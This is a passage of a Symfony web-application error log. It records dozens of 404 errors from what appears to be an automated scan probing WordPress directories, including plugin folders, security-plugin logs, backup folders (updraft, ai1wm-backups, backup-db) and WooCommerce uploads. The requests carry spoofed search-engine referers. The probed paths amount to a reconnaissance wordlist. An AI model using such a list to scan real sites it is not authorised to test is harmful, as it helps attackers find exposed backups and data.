  94. [2025-12-15 23:43:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/plugins/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/plugins/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  95. [2025-12-15 23:43:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/plugins/HelloDollyV2/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/plugins/HelloDollyV2/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  96. [2025-12-15 23:44:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/themes/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/themes/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  97. [2025-12-15 23:44:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/upgrade/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/upgrade/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  98. [2025-12-15 23:44:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  99. [2025-12-15 23:44:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  100. [2025-12-15 23:44:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/ID3/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/ID3/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  101. [2025-12-15 23:44:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  102. [2025-12-15 23:44:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/PHPMailer/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/PHPMailer/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  103. [2025-12-15 23:44:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Requests/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Requests/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  104. [2025-12-15 23:44:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Requests/Auth/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Requests/Auth/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  105. [2025-12-15 23:44:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/SimplePie/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/SimplePie/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  106. [2025-12-15 23:44:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/SimplePie/Content/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/SimplePie/Content/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  107. [2025-12-15 23:44:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  108. [2025-12-15 23:44:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  109. [2025-12-15 23:44:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  110. [2025-12-15 23:44:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Renderer/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Renderer/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  111. [2025-12-15 23:44:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/assets/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/assets/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  112. [2025-12-15 23:44:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  113. [2025-12-15 23:44:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-patterns/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-patterns/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  114. [2025-12-15 23:44:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  115. [2025-12-15 23:44:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/certificates/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/certificates/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  116. [2025-12-15 23:44:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/css/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/css/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  117. [2025-12-15 23:44:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/customize/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/customize/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  118. [2025-12-15 23:44:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/cache/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/cache/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  119. [2025-12-15 23:44:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/w3tc/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/w3tc/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  120. [2025-12-15 23:44:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/et-cache/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/et-cache/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  121. [2025-12-15 23:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/cache/supercache/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/cache/supercache/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  122. [2025-12-15 23:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/wflogs/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/wflogs/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  123. [2025-12-15 23:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/updraft/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/updraft/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  124. [2025-12-15 23:44:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/ai1wm-backups/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/ai1wm-backups/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  125. [2025-12-15 23:44:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  126. [2025-12-15 23:44:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backup-db/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backup-db/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  127. [2025-12-15 23:44:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/woocommerce_uploads/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/woocommerce_uploads/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  128. [2025-12-15 23:44:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/woocommerce/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/woocommerce/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  129. [2025-12-15 23:44:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/wc-logs/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/wc-logs/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  130. [2025-12-15 23:44:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  131. [2025-12-15 23:44:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  132. [2025-12-15 23:44:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/fonts/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/fonts/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
